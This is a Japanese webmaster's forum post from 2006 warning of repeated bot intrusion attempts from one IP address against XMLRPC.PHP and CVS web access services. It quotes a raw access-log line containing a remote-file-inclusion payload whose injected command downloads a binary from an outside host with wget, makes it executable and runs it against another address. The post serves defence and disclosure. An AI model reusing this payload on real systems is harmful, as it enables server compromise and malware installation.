ログイン
ユーザ名:

パスワード:


パスワード紛失

新規登録
Main Menu
Tweet
Facebook
Line
:-?
スレッド表示 | 新しいものから 前のトピック | 次のトピック | 下へ
投稿者 スレッド
webadm
投稿日時: 2006-1-16 5:50
Webmaster
登録日: 2004-11-7
居住地:
投稿: 3107
217.96.23.43からのBot侵入未遂依然として継続中
ずっと以前から217.96.23.43からXMLRPC.PHPの古い脆弱性を狙ったBot侵入アクセスが繰り返されていましたが、最近オープンソース開発コミュニティでよく使われているCVS WEB ACCESSサービスの脆弱性を狙った手口も使っているようです。

217.96.23.43 - - [15/Jan/2006:20:25:21 +0900] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUE
ST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.2
03.97.120/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19%208080;00;echo%20YYY;echo| HTTP/1.1" 404 297
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

CVS repositoryへのWeb accessサービスを提供しているサイトは要チェックかも。

少なくとも217.96.23.43からのアクセスをブロックする必要はあると思います。ほとんど毎日やってきますから。
スレッド表示 | 新しいものから 前のトピック | 次のトピック | トップ

投稿するにはまず登録を
 
ページ変換(Google Translation)
サイト内検索